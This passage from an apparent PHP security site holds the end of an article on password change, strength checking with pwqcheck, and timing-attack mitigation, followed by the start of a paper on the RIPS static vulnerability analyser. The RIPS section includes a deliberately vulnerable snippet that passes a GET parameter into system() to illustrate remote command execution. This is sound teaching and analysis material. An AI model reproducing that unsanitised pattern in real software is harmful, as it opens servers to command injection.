<input type="text" name="user" size="60"><br>
Current password:<br>
<input type="password" name="pass" size="60"><br>
New password:<br>
<input type="password" name="newpass" size="60"><br>
<input type="submit" value="Change password">
</form>

and support for the additional operation code into the PHP script:

$op = $_POST['op'];
if ($op !== 'new' && $op !== 'login' && $op !== 'change')
    fail('Unknown request');

Now let’s add to the user authentication branch of the existing if / else statement. When authentication fails, reset $op such that we don’t take any other action:

    if ($hasher->CheckPassword($pass, $hash)) {
        $what = 'Authentication succeeded';
    } else {
        $what = 'Authentication failed';
        $op = 'fail'; // Definitely not 'change'
    }

Then add our new code:

    if ($op === 'change') {
        $stmt->close();

        $newpass = get_post_var('newpass');
        if (strlen($newpass) > 72)
            fail('The new password is too long');
        $hash = $hasher->HashPassword($newpass);
        if (strlen($hash) < 20)
            fail('Failed to hash new password');
        unset($hasher);

        ($stmt = $db->prepare('update users set pass=? where user=?'))
            || fail('MySQL prepare', $db->error);
        $stmt->bind_param('ss', $hash, $user)
            || fail('MySQL bind_param', $db->error);
        $stmt->execute()
            || fail('MySQL execute', $db->error);

        $what = 'Password changed';
    }

That’s it – an existing user may now change their password.

This revision of the HTML file and the sample program may be found in the demo4 subdirectory in the accompanying archive (tar.gz, ZIP).

In a real PHP application, you will likely also have other ways to change a user’s password – by an administrative user (then authentication of the user is bypassed) or with authentication by a temporary token (for forgotten passwords). These may be implemented in a similar fashion.

How to enforce a password policy

As far as I’m aware, there’s currently no decent password/passphrase strength checking module intended specifically for PHP (either written in PHP or implemented as a PHP extension). The Crack extension in PECL, which is an interface to CrackLib, is not quite it, just as CrackLib itself is not good enough these days. There are many regexp-based recipes found on the web, but these disregard or disallow passphrases, have the policy hard-coded, and are mostly untested on real-world passwords.

So we will be invoking the pwqcheck(1) program from the passwdqc package. This program is specifically intended for use from scripts.

Let’s introduce a new PHP include file, called pwqcheck.php, defining the following function:

function pwqcheck($newpass, $oldpass = '', $user = '', $aux = '', $args = '')
{
// pwqcheck(1) itself returns the same message on internal error
    $retval = 'Bad passphrase (check failed)';

    $descriptorspec = array(
        0 => array('pipe', 'r'),
        1 => array('pipe', 'w'));
// Leave stderr (fd 2) pointing to where it is, likely to error_log

// Replace characters that would violate the protocol
    $newpass = strtr($newpass, "\n", '.');
    $oldpass = strtr($oldpass, "\n", '.');
    $user = strtr($user, "\n:", '..');

// Trigger a "too short" rather than "is the same" message in this special case
    if (!$newpass && !$oldpass)
        $oldpass = '.';

    if ($args)
        $args = ' ' . $args;
    if (!$user)
        $args = ' -2' . $args; // passwdqc 1.2.0+

    $command = 'exec '; // No need to keep the shell process around on Unix
    $command .= 'pwqcheck' . $args;
    if (!($process = @proc_open($command, $descriptorspec, $pipes)))
        return $retval;

    $err = 0;
    fwrite($pipes[0], "$newpass\n$oldpass\n") || $err = 1;
    if ($user)
        fwrite($pipes[0], "$user::::$aux:/:\n") || $err = 1;
    fclose($pipes[0]) || $err = 1;
    ($output = stream_get_contents($pipes[1])) || $err = 1;
    fclose($pipes[1]);

    $status = proc_close($process);

// There must be a linefeed character at the end.  Remove it.
    if (substr($output, -1) === "\n")
        $output = substr($output, 0, -1);
    else
        $err = 1;

    if ($err === 0 && ($status === 0 || $output !== 'OK'))
        $retval = $output;

    return $retval;
}

Please note that this passes any untrusted input via the file descriptor, not via the command-line (which would be unsafe). Please refer to the pwqcheck(1) manual page included in the passwdqc package for information on the command-line options and on the “protocol” used.

The function accepts the new password or passphrase, the strength of which is to be checked. It optionally also accepts the old password or passphrase, the username, and any auxiliary user-specific information such as the user’s full name and/or e-mail address (multiple items may be separated with spaces). All of this information is treated as untrusted input, and it is used for more accurate checking of the strength of the new password or passphrase.

Finally, the function optionally accepts additional arguments to pass to pwqcheck(1) via the command-line. These may override the default password policy. Obviously, they must not be under an untrusted user’s control.

The return value is the string ‘OK’ if the new password/passphrase passes the requirements. Otherwise the return value is a message explaining one of the reasons why the password/passphrase is rejected.

Let’s make use of this in our program. Include the file and define some settings (that we’ll use a bit later):

require 'pwqcheck.php';

// Do we have the pwqcheck(1) program from the passwdqc package?
$use_pwqcheck = TRUE;
// We can override the default password policy
#$pwqcheck_args = 'config=/etc/passwdqc.conf';

Define a wrapper function specific to our program:

function my_pwqcheck($newpass, $oldpass = '', $user = '')
{
    global $use_pwqcheck, $pwqcheck_args;
    if ($use_pwqcheck)
        return pwqcheck($newpass, $oldpass, $user, '', $pwqcheck_args);

/* Some really trivial and obviously-insufficient password strength checks -
 * we ought to use the pwqcheck(1) program instead. */

    $check = '';
    if (strlen($newpass) < 7)
        $check = 'way too short';
    else if (stristr($oldpass, $newpass) ||
        (strlen($oldpass) >= 4 && stristr($newpass, $oldpass)))
        $check = 'is based on the old one';
    else if (stristr($user, $newpass) ||
        (strlen($user) >= 4 && stristr($newpass, $user)))
        $check = 'is based on the username';
    if ($check)
        return "Bad password ($check)";
    return 'OK';
}

Please note that this lets you experiment with very basic password strength checking (with a trivial hard-coded policy) even if you have not yet installed passwdqc.

Finally, introduce uses of the function into two places in the program – when creating a new user:

if ($op === 'new') {
    if (($check = my_pwqcheck($pass, '', $user)) !== 'OK')
        fail($check);

and when changing a user’s password:

    if ($op === 'change') {
        $stmt->close();

        $newpass = get_post_var('newpass');
        if (strlen($newpass) > 72)
            fail('The new password is too long');
        if (($check = my_pwqcheck($newpass, $pass, $user)) !== 'OK')
            fail($check);

We’re done. Now let’s test it – strong passwords and passphrases should be accepted, whereas weak ones should be getting rejected with various messages.

The pwqcheck.php file (with a lengthy comment in it) and this revision of the sample program are found in the demo5 subdirectory in the accompanying archive (tar.gz, ZIP).

Future work

Someone should create a PHP extension around passwdqc, making the functions of libpasswdqc available for use from PHP scripts.

Timing attacks

Our sample program is vulnerable to probing for valid usernames via timing attacks: its response time differs for existing vs. non-existent users.

We may try to mitigate this by always performing the password hashing step – even if the target username could not be found in the database. First, we need to define a dummy “salt” string (a portion of the hash encoding string) that we’ll use for computing the dummy hashes:

/* Dummy salt to waste CPU time on when a non-existent username is requested.
 * This should use the same hash type and cost parameter as we're using for
 * real/new hashes.  The intent is to mitigate timing attacks (probing for
 * valid usernames).  This is optional - the line may be commented out if you
 * don't care about timing attacks enough to spend CPU time on mitigating them
 * or if you can't easily determine what salt string would be appropriate. */

$dummy_salt = '$2a$08$1234567890123456789012';

Then we introduce the following code right before our call to CheckPassword():

    // Mitigate timing attacks (probing for valid usernames)
    if (isset($dummy_salt) && strlen($hash) < 20)
        $hash = $dummy_salt;


Alternatively, we could use the HashPassword() method, which would generate a new salt for us, but its processing cost is not exactly the same as that of CheckPassword(), so a (smaller) timing leak would remain.

A revision of the sample program with the above changes is included in the demo6 subdirectory in the accompanying archive (tar.gz, ZIP).

Unfortunately, this does not fully eliminate timing leaks – e.g., the MySQL server’s response time may differ – but those leaks are likely smaller than leaks through properly-stretched (purposely slow) password hashing. Yet it might remain possible to probe for valid usernames with a large number of timings for each potential username.

Moreover, major timing leaks will remain if your database contains hashes of mixed types or with different password stretching iteration counts.


Timing leaks are surprisingly difficult to fully deal with. Naive attempts to deal with them, such as introducing random delays (even those in excess of “the signal”), do not work as well as one might expect. “Constant time” would do the trick, but it is difficult to achieve, especially when we consider both real and CPU time, as well as other server resource consumption, which could also be indirectly measured by an attacker.

Other related concerns

There are many other security, usability, and implementation issues closely related to the way a web application manages its users and passwords. Discussing those issues in full detail and with sample code is beyond the scope of this article, yet it is important for you to be aware of them.

Randomly-generated passwords/passphrases

As an alternative to forcing the user to come up with a “strong-looking” password or passphrase, an application may generate and offer a random password or passphrase. (Preferably, the user should also be allowed to pick a suitable password or passphrase of their own, which is the case we’ve been considering so far.)

This is particularly important when new accounts are to be created by an administrator rather than by the users themselves. It would be unrealistic for the administrator to come up with sufficiently different passwords/passphrases for a large number of users, so letting a computer generate those passwords or passphrases is the only reasonable way to go.

One of the ways to implement this is by invoking the pwqgen(1) program from the passwdqc package. Unlike the pwqcheck(1) program discussed above, pwqgen does not require two-way communication via file descriptors, so you may invoke it with the simpler popen() and pclose() functions. Please be sure to check the exit status from the program. Currently, pwqgen only works on systems with /dev/urandom.
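As a rough illustration of the popen()/pclose() approach just described, here is a minimal sketch. The function name my_pwqgen() and its $command parameter are hypothetical (they are not part of passwdqc or of the sample programs), and the sketch assumes that pwqgen is in the PATH and prints a single line on success.

```php
<?php
// Hypothetical helper: run a password generator command and return the
// single line it prints, or FALSE on any failure.  $command must be a
// trusted string; never build it from user input.
function my_pwqgen($command = 'pwqgen')
{
    if (!($fh = @popen($command, 'r')))
        return FALSE;
    $line = fgets($fh);
    // pclose() returns the termination status of the process
    $status = pclose($fh);

    // Reject a failed read or a non-zero exit status
    if ($line === FALSE || $status !== 0)
        return FALSE;

    // Strip the trailing linefeed and refuse an empty result
    $line = rtrim($line, "\r\n");
    return $line !== '' ? $line : FALSE;
}
```

A caller would treat a FALSE return value as a hard error (for example, by calling fail()) rather than falling back to a weaker generator silently.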

It is also possible to try to generate random passwords or passphrases in PHP code and without a dependency on /dev/urandom, but chances are that those passwords or passphrases won’t in fact be as random as they might look – e.g., certain versions of Joomla running with certain versions of PHP are able to generate at most 1 million different initial passwords, which an attacker can test against a stolen or leaked password hash in a second.

Randomness

It is difficult to obtain a significant amount of cryptographically random data in pure and portable PHP code. As mentioned above, phpass uses /dev/urandom with a fallback to its own pseudo-random byte stream generator. The latter is good enough for salting, but it might not be good enough for other purposes because of the limited amount of entropy that it uses as its input. Other than that, it uses a decent approach. Drupal 7 attempts to reuse a revision of the same code (derived from phpass) to generate all sorts of random tokens, not just salts, and the Drupal developers are trying to process more entropy by feeding certain PHP variables and results of certain PHP function calls into the algorithm. It is difficult to say just how much entropy is added in this way and whether it is sufficient for a given purpose or not. Additionally, a related concern is that if not enough entropy is being processed, then it might be possible to infer the inputs to the algorithm from the stream of “random” outputs by testing likely inputs in an offline attack. So a reasonable requirement for the inputs could be that they not only are hopefully sufficiently random, but are also not security-sensitive otherwise.

Other algorithms may have additional undesirable properties – such as leaking of the inputs or/and of the internal state in a more direct way, thereby allowing for further “random” outputs to be predicted. Furthermore, if the size or entropy of the internal state is too small, then the entropy of the resulting “random” outputs will also likely be smaller than that of the inputs, and additionally the internal state itself may be inferred in an offline attack given a few “random” outputs, which would facilitate prediction of further “random” outputs.

Overall, it is easier to get this wrong than to get it right, and you’re unlikely to have any assurance of having it done right.

Thus, it is preferable to use a supply of randomness provided by the OS, such as /dev/urandom.

Another option is to run and query a “randomness daemon”, which would accumulate randomness over a long period of time, but this approach has been largely obsoleted by modern Unix-like systems having implemented a randomness pool in the kernel, which is what /dev/urandom is an interface to.

A PHP-specific issue with accessing an external supply of randomness, such as /dev/urandom, is PHP’s lack of support for unbuffered reads. Even if your application only reads, say, 8 bytes, PHP will read an entire buffer worth of data (typically 8192 bytes). This slows things down (albeit not too badly – e.g., it might be taking around 1 millisecond to read 8192 bytes from /dev/urandom on a modern Linux box) and it wastes the precious entropy. A revision of phpass-derived code being considered for Drupal 7 attempts to partially address this by rounding up the number of bytes to read to a multiple of 4096 (considering that PHP would effectively do at least the same anyway) and by maintaining its own buffer for use in subsequent calls to the function. This helps when multiple random “numbers” need to be obtained while servicing a single request, but other than that it is only a partial workaround. It would be best to have the issue fixed in PHP itself (by introducing optional unbuffered reads).
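For illustration, reading a few bytes from /dev/urandom might look like the sketch below. The function name urandom_bytes() is hypothetical. The call to stream_set_read_buffer() is an assumption about the PHP version in use: it is only made where that function exists, and on PHP builds without it the read-ahead behavior described above still applies.

```php
<?php
// Hypothetical helper: return $count random bytes read from /dev/urandom,
// or FALSE if the device cannot be opened or read.
function urandom_bytes($count)
{
    if ($count < 1 || !($fh = @fopen('/dev/urandom', 'rb')))
        return FALSE;

    // Assumption: where stream_set_read_buffer() is available, a buffer
    // size of 0 asks PHP not to read ahead more than we request.
    if (function_exists('stream_set_read_buffer'))
        stream_set_read_buffer($fh, 0);

    $output = '';
    while (strlen($output) < $count) {
        // fread() may return fewer bytes than requested, so loop
        $chunk = fread($fh, $count - strlen($output));
        if ($chunk === FALSE || $chunk === '') {
            fclose($fh);
            return FALSE;
        }
        $output .= $chunk;
    }
    fclose($fh);
    return $output;
}
```

As with any randomness source, a FALSE return value should be treated as an error by the caller, not replaced silently with a weaker generator.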

Resetting forgotten passwords/passphrases

Typically, there’s a way for a user to reset the password (or passphrase) by having the application send a message to the user’s address previously registered in the system. The message may contain the new password (randomly generated) or it may contain a password reset token. The randomness concerns apply.

Here are some questions to consider before implementing this functionality:

Is the new password or passphrase passed in this way permanent or is it temporary (with a forced change upon login and/or an expiration date)?

If a token is passed, is it expiring? How is it to be passed back to the application?

(If it is embedded in a URL, then it is likely to get logged by any web proxy servers involved and by the final web server. Manual entry or copy & paste into a form field might be a little bit safer.)

The token may be randomly generated and stored into the database. Alternatively, it may be computed as a MAC of the username, the user’s address that the token is to be sent to (e-mail or the like), the current timestamp (with certain granularity – e.g., just the date, with no time of day), and maybe other system- and user-specific information, and with a secret key specific to each instance of the application. In the latter case, when a user returns to the system with a token to be validated, the correct token is simply regenerated using all the same data. If the two tokens match, the user is considered authenticated. If they don’t, the check is repeated for the “previous” timestamp (just one time). Thus, these cryptographic tokens automatically expire in 1 to 2 “units of time”, but there’s no way to deactivate them before they expire (e.g., upon first use) unless an extra parameter (such as a password change count for the user) was included under the MAC. The secret key needs to contain enough entropy (say, 80 bits or more) to withstand offline attacks on it given a valid token, and it needs to be different for each instance of the application. Luckily, it does not need to be easy to memorize, so there’s no need to use key stretching, but instead this lack of stretching needs to be compensated for by including more entropy into the key than you would include into a password.
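The MAC-based scheme described above could be sketched roughly as follows. This is only an illustration under stated assumptions: the function names reset_token() and check_reset_token() are hypothetical, HMAC-SHA-256 via hash_hmac() is just one possible choice of MAC, the “unit of time” is assumed to be one day (UTC), and hash_equals() requires PHP 5.6 or newer. The password change count is included so that a token stops validating once the password has been changed.

```php
<?php
// Hypothetical helper: compute a reset token for the day containing $time.
// $key is the per-installation secret key.
function reset_token($key, $user, $email, $change_count, $time)
{
    // Day granularity: the date only, with no time of day
    $day = gmdate('Y-m-d', $time);
    // Encode the fields unambiguously before computing the MAC
    $msg = json_encode(array($user, $email, (int)$change_count, $day));
    return hash_hmac('sha256', $msg, $key);
}

// Hypothetical helper: accept a token computed for the current or the
// previous day, so tokens expire in 1 to 2 days.
function check_reset_token($token, $key, $user, $email, $change_count, $now)
{
    foreach (array($now, $now - 86400) as $t) {
        $expected = reset_token($key, $user, $email, $change_count, $t);
        // hash_equals() compares in constant time (PHP 5.6+)
        if (hash_equals($expected, (string)$token))
            return TRUE;
    }
    return FALSE;
}
```

Nothing needs to be stored in the database for such a token, at the cost of not being able to revoke it other than through the parameters covered by the MAC.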

Online password guessing

With password hashing, we’ve been trying to mitigate offline password cracking given stolen or leaked password hashes. However, what about online attacks – where an attacker probes candidate passwords or passphrases by trying to authenticate to our web application with them? Obviously, those attacks would generally run a lot slower than offline ones, yet they might succeed in guessing some of the weakest passwords. For example, simply probing for the password “123456” might result in almost 1% of accounts getting compromised.

Luckily, by enforcing a password policy meant to prevent easy cracking of our password hashes, we also defeat online password guessing. Thus, if you went for this, then implementing any other measures to deal with online password guessing becomes relatively unimportant. In fact, if you’re confident in your password policy, then you may use very relaxed account lockout settings or none at all in order to avoid causing problems for legitimate users.

On the other hand, if you neglected or decided not to implement password policy enforcement, if you have old passwords that pre-date the policy, or if you have potentially non-compliant passwords for any other reason (e.g., imported from another system), then it may be important to implement countermeasures against online password probing. A typical countermeasure is temporary or permanent account lockout if more than N consecutive authentication attempts fail in X time. This should be further improved to deal with attacks that don’t target a specific username – e.g., if an attacker tries just the password “123456” against 1000 different usernames, no single user account will be locked out, yet the attacker might gain access to around 10 accounts (if all of the usernames exist). A way to mitigate this is to apply per-connecting-address limits on authentication attempts. Yet a distributed attack, such as using a botnet, would defeat that. So enforcing a password policy is a better way to go.
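The “more than N failures in X time” check itself is simple; a minimal sketch follows. The function name too_many_failures() is hypothetical, and the sketch assumes that the application records the timestamps of failed attempts somewhere (for example, in a database table) and clears them on a successful login. The same check could be applied to a list kept per username or per connecting address.

```php
<?php
// Hypothetical helper.  $failures is a list of Unix timestamps of failed
// authentication attempts since the last success, recorded either for one
// username or for one connecting address.
function too_many_failures($failures, $now, $max_failures, $window)
{
    $recent = 0;
    foreach ($failures as $t) {
        // Count only the failures that fall within the last $window seconds
        if ($t > $now - $window && $t <= $now)
            $recent++;
    }
    return $recent > $max_failures;
}
```

For example, with $max_failures set to 3 and $window set to 60, a fourth failure within a minute would make the function return TRUE, and the application could then refuse further attempts for a while.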

Denial of Service (DoS) attacks

Almost any network service is susceptible to certain kinds of resource consumption DoS attacks. As it relates to the topic of this article, online password probing attacks discussed above may also happen to be DoS attacks, typically unintentionally. Currently, this is not common with web applications, but it does happen with other network services.

Intentional DoS attacks may find and use requests that are even more costly for the server to process – e.g., those involving expensive database queries – or they may simply use an even higher intensity stream of non-targeted requests.

- “Doesn’t password stretching make my web application more susceptible to DoS attacks?”

- With reasonable settings, no. The application developer should provide a default password stretching iteration count that will not make this a problem in practice, and the system administrator may tune this setting to better match a given system’s capacity and expected use pattern. For example, if a web application is not able to handle more than 50 requests per second for other reasons anyway, then having password authentication take 10 ms will not provide a significantly more attractive way of attack. In fact, since different kinds of requests consume server resources differently, perhaps the login request, which does not involve much work besides password hashing on the CPU, won’t be the heaviest. Quite often, disk I/O capacity (and not CPU time) is the scarce resource.

Another potential DoS attack relevant to the topic of this article is through registration of too many user accounts, if your web application is meant to permit users to self-register. This kind of attack is currently not common in practice – likely because other DoS attacks, which are of less relevance to this article, are more effective. To mitigate this attack, you could implement all sorts of limits – e.g., no more than N user registrations per source IP address per day, no more than M users with the same domain name portion of e-mail address – and require validation of the e-mail address by a “secure token” implemented using a MAC before the user is added to the database.

Password policy enforcement and usability concerns

It may be inconvenient for many users to have to submit a form only to get their desired password or passphrase rejected (for not being compliant with the policy), then have to come up with another password or passphrase and resubmit.

This may be partially dealt with by summarizing the gist of the policy on the web page with the form – e.g. for passwdqc’s default policy as of this writing you can use:

“A valid password should be a mix of upper and lower case letters, digits, and other characters. You can use an 8 character long password with characters from at least 3 of these 4 classes, or a 7 character long password containing characters from all the classes. An upper case letter that begins the password and a digit that ends it do not count towards the number of character classes used.

A passphrase should be of at least 3 words, 11 to 40 characters long, and contain enough different characters.”

You may also offer randomly generated passwords and/or passphrases. Just do not give any static examples of passwords or phrases that would pass the check.

Another improvement could be to have the web page check the strength of the password or passphrase as the user types it – such as by submitting it to the server every few seconds via Ajax or by duplicating the most critical password strength checks in JavaScript.

(Of course, this feature would only work if JavaScript is enabled in the user’s web browser.)

Neither approach is perfect: the former would cause extra server load and the latter would not duplicate passwdqc’s actual checks exactly (they are a bit too complicated to fully duplicate them in JavaScript). Yet if you’re so inclined, the C function to look at is is_simple() in passwdqc_check.c. A hybrid approach may work best – only bother the server with checking passwords or passphrases that pass the JavaScript checks.

Of course, actual policy enforcement should be taking place on the server when the form is finally submitted anyway.

Challenge/response authentication

Although the standard way to protect web application passwords while in transit is with SSL (https URLs), it may also be possible to protect them to a very limited extent by implementing challenge/response authentication. On the web browser side, this would be implemented in JavaScript (with a fallback to sending the password in the clear when JavaScript is not available).

Unfortunately, implementing this involves trade-offs, and the implementations I’ve seen so far are not great – they require that plaintext-equivalents of passwords or at best relatively weak password hashes be stored on the server, which is unacceptable when the number of user accounts is large (because the cost of recovery from a security compromise of the server or, say, of a backup dump becomes prohibitive).

Although storage of plaintext-equivalents on the server can be avoided, certain other issues remain (e.g., it might not be possible to implement much password stretching in this way due to the slowness of JavaScript code).

So I do not currently recommend this approach (major advances in this area would need to occur first), yet I felt that it needed to be mentioned in here.

Sessions

Once a user logs in, a session needs to be created – such as by using PHP’s session handling capabilities or otherwise. There are plenty of potential issues related to session management, which could be the subject of a separate article. Since this is not very closely related to user and password management, since this is such a complicated topic, and since this article is too long as it is, I am leaving this topic completely beyond the scope of this article.

Licensing

This article, not including the embedded code snippets, is
Copyright (c) 2010 Alexander Peslyak.
All rights reserved.

Permission is hereby granted to reproduce and redistribute the article and its
accompanying archive in their original form (unmodified and electronic only).

Non-exclusive rights are hereby granted to SektionEins GmbH to reproduce,
distribute, and advertise the article including but not limited to on the
http://php-security.org website,
in printed and/or electronic advertisements, and in all other media.

Others interested in reproducing and/or redistributing the article other than
in its original form and/or other than electronically should contact the
copyright holder for an express permission.

No copyright to the source code snippets found in this article and to the
sample programs included in the accompanying archive is claimed, and they’re
hereby placed in the public domain.
Please feel free to reuse them in your programs.

In case this attempt to disclaim copyright and place the source code snippets
and the sample programs in the public domain is deemed null and void, then the
snippets and the programs are Copyright (c) 2010 Alexander Peslyak and they’re
hereby released to the general public under the following terms:

Redistribution and use in source and binary forms,
with or without modification, are permitted.


(This is heavily cut-down “BSD license”, to the point of being copyright only.)

]]>
http://php-security.org/2010/05/26/mops-submission-10-how-to-manage-a-php-applications-users-and-passwords/feed/ 0
MOPS Submission 09: RIPS – A static source code analyser for vulnerabilities in PHP scripts http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/ http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/#comments Mon, 24 May 2010 10:29:50 +0000 admin http://php-security.org/?p=338 During the last hours of the CFP we received the following MOPS submission by Johannes Dahse. It is a static code analysing tool for PHP based on the tokenizer extension.

RIPS – A static source code analyser for vulnerabilities in PHP scripts

Johannes Dahse

[PDF Version]  [Download RIPS]

Table of Contents

  1. Introduction
  2. The concept of taint analysis
  3. The tokenizer
  4. The web interface
  5. Results
  6. Limitations and future work
  7. Related work
  8. Summary

1. Introduction

The number of websites has increased rapidly over the last few years. While websites consisted mostly of static HTML files in the last decade, more and more web applications with dynamic content have appeared as a result of easy-to-learn scripting languages such as PHP and other new technologies. In fact, PHP is the most popular scripting language on the World Wide Web today. Besides a huge number of new possibilities, the new Web 2.0 also brings a lot of security risks when data supplied by a user is not handled carefully enough by the application. Different types of vulnerabilities can lead to data leakage, data modification or even server compromise. In the last year, 30% of all vulnerabilities found in computer software were PHP-related 1.

In order to contain the risks of vulnerable web applications, penetration testers are hired to review the source code. Given that large applications can have thousands of lines of code and time is limited by costs, a manual source code review might be incomplete. Tools can help penetration testers to minimize time and costs by automating time-intensive processes while reviewing source code.

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at
http://www.sourceforge.net/projects/rips-scanner/. The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.

2. The concept of taint analysis

When performing source code audits over and over again, one notices that the same procedure for finding security flaws is repeated frequently. First, potentially vulnerable functions (PVF) like system() or mysql_query() which can lead to certain vulnerabilities are detected, and then their parameters consisting of variables are traced back to their origin. If a parameter with which the PVF has been called can be specified or modified by a user, this parameter is marked as tainted and the PVF call is treated as a potential security vulnerability. Sources of user input in PHP can be the global variables $_GET, $_POST, $_COOKIE and $_FILES as well as some $_SERVER and $_ENV variables 2. Also, several functions that read from databases, files or environment variables can return user input and taint other variables. When parameters are traced backwards, the conditional program flow and potential securing actions have to be taken into account to avoid false positives. The following two PHP scripts use the PVF system(), which executes system commands 3:

Example 1:

<?php
    $a = $_GET['a'];
    $b = $a;
    system($b, $ret);
?>

Example 2:

<?php
    $a = $_GET['a'];
    $b = 'date';
    system($b, $ret);
?>

While the first example shows a remote command execution vulnerability where a user can specify any command to be executed through the GET parameter a, the second example is not a vulnerability because the command being executed is static and cannot be influenced by an attacker.

In order to automate the process of finding security flaws, a large list of PVFs has been built, consisting of PHP functions that can lead to a security flaw when called with unsanitized user input. This list includes rather obscure PVFs like preg_replace_callback() or highlight_file(), to name a few exotic ones. RIPS in its current state scans for 139 PVFs.

Once a PVF is detected, the next step is to identify its parameters. In the first example these are the variables $b and $ret. Those variables are compared to previously declared variables. This is where line 3 is found, which assigns $a to $b. Again, $a will be compared to previously declared variables and so on. If a parameter originates from user input, the PVF call is treated as a potential vulnerability. The tree of traced parameters is then shown in reversed order to the user, who can decide whether it is a real vulnerability or a false positive.

Scan result for example 1:

4 : system($b ,$ret);
    3 : $b = $a;
        2 : $a = $_GET['a'];
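
The backward trace described above can be sketched as follows. This is a minimal illustration and not the RIPS implementation: the $assignments table is a hand-written, hypothetical model of example 1, the helper name traceBack() is an assumption, and control flow as well as securing functions are ignored.

```php
<?php
// Hypothetical model of example 1: line number => assigned variable and the
// variables read on the right-hand side of the assignment.
$assignments = array(
    2 => array('var' => '$a', 'uses' => array('$_GET')),
    3 => array('var' => '$b', 'uses' => array('$a')),
);

// Assumed (incomplete) list of user input sources.
$sources = array('$_GET', '$_POST', '$_COOKIE', '$_FILES');

/**
 * Trace $var backwards, starting above $fromLine. Returns the visited line
 * numbers if user input is reached, or null if the value is not tainted.
 */
function traceBack($var, $fromLine, array $assignments, array $sources)
{
    if (in_array($var, $sources, true)) {
        return array();                       // reached user input
    }
    // Find the closest assignment to $var above $fromLine.
    for ($line = $fromLine - 1; $line >= 1; $line--) {
        if (isset($assignments[$line]) && $assignments[$line]['var'] === $var) {
            foreach ($assignments[$line]['uses'] as $used) {
                $trace = traceBack($used, $line, $assignments, $sources);
                if ($trace !== null) {
                    return array_merge(array($line), $trace);
                }
            }
            return null;                      // assigned from static values only
        }
    }
    return null;                              // never assigned: not tainted
}

// system($b, $ret) is called on line 4; only $b is traced.
$trace = traceBack('$b', 4, $assignments, $sources);
echo implode(' <- ', $trace), "\n";
```

For example 2, the entry for line 3 would have an empty 'uses' list, so the trace ends there and the call is not reported.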

It is important to trace only significant parameters to reduce false positives. The second parameter of the function system() stores the return status of the executed command in the variable $ret in our example. Therefore the second parameter $ret should not be traced, because a previously defined variable $ret containing user input would lead to a false positive. Another source of false positives is securing actions taken by the developer.
The following example is considered safe:

<?php
    $a = $_GET['a'];
    $b = escapeshellarg($a);
    $c = 'cal ' . $b;
    system($c, $ret);
?>

The function escapeshellarg() prevents the attacker from injecting arbitrary commands into the system call 4. A typecast of $a to integer assigned to $b would also prevent a command execution vulnerability. Therefore a list of securing functions is assigned to each element in the PVF list, and a global list of securing or eliminating functions (e.g. md5()) and actions (e.g. typecasts) is defined. Because securing can be implemented incorrectly, the user has the option to review all detected potential vulnerabilities with securing operations.

Here is an example of a PVF entry for the function system() with the significant parameter (the first) and securing functions (escapeshellarg() and escapeshellcmd()):

"system" => array (
    array(1), array("escapeshellarg", "escapeshellcmd")
);

The significant parameter can also be a list of parameters or 0 if all parameters should be treated as dangerous. Each PVF can be configured precisely like that. The difficult part is to take the program flow and code structures into consideration while tracing parameters.
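
How such an entry could be consulted when a call is found is sketched below. The helper significantArguments() is hypothetical, and representing "all parameters" as array(0) is an assumption about the configuration format.

```php
<?php
// PVF entry in the format shown above.
$pvfList = array(
    'system' => array(
        array(1), array('escapeshellarg', 'escapeshellcmd')
    ),
);

/**
 * Return the arguments of a call that should be traced, based on the
 * 1-based positions stored in the PVF entry (array(0) is assumed to
 * mean "all parameters").
 */
function significantArguments(array $pvfList, $function, array $arguments)
{
    if (!isset($pvfList[$function])) {
        return array();                       // not a PVF: nothing to trace
    }
    $positions = $pvfList[$function][0];
    if ($positions === array(0)) {
        return array_values($arguments);      // every parameter is dangerous
    }
    $selected = array();
    foreach ($positions as $position) {
        if (isset($arguments[$position - 1])) {
            $selected[] = $arguments[$position - 1];
        }
    }
    return $selected;
}

// For system($b, $ret) only the first argument is selected for tracing.
$toTrace = significantArguments($pvfList, 'system', array('$b', '$ret'));
```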

3. The tokenizer

In order to analyse a PHP script correctly, the code is split into tokens. For this, the PHP function token_get_all() 5 is used. Each token is an array with a token identifier which can be turned into a token name by calling token_name() 6, the token value and the line number. Single characters which represent the code's semantics appear as a string in the token list.

Example 4:

<?php
    $a = $_GET['a'];
    system($a, $ret);
?>

Token list of example 4 generated by token_get_all():

name: T_OPEN_TAG            value: <?php    line: 1
name: T_VARIABLE            value: $a   line: 2
name: T_WHITESPACE          value:      line: 2
                        =
name: T_WHITESPACE          value:      line: 2
name: T_VARIABLE            value: $_GET    line: 2
                        [
name: T_CONSTANT_ENCAPSED_STRING    value: 'a'  line: 2
                        ]
                        ;
name: T_WHITESPACE          value:      line: 2
name: T_STRING              value: system   line: 3
                        (
name: T_VARIABLE            value: $a   line: 3
                        ,
name: T_WHITESPACE          value:      line: 3
name: T_VARIABLE            value: $ret     line: 3
                        )
                        ;
name: T_WHITESPACE          value:      line: 3
name: T_CLOSE_TAG           value: ?>   line: 4
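
A listing like the one above can be produced with a few lines of PHP. The sketch below uses only token_get_all() and token_name(); the helper name describeTokens() and the output layout are assumptions, and the sample source omits the closing tag for brevity.

```php
<?php
// Sample source similar to example 4.
$code = "<?php\n    \$a = \$_GET['a'];\n    system(\$a, \$ret);\n";

/**
 * Turn the token list into rows of (name, value, line). Single characters
 * such as "=", "(" or ";" are plain strings and get no name or line.
 */
function describeTokens($code)
{
    $rows = array();
    foreach (token_get_all($code) as $token) {
        if (is_array($token)) {
            // array(identifier, value, line number)
            $rows[] = array(token_name($token[0]), $token[1], $token[2]);
        } else {
            $rows[] = array(null, $token, null);
        }
    }
    return $rows;
}

foreach (describeTokens($code) as $row) {
    if ($row[0] === null) {
        echo $row[1], "\n";
    } else {
        printf("name: %s  value: %s  line: %d\n", $row[0], trim($row[1]), $row[2]);
    }
}
```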

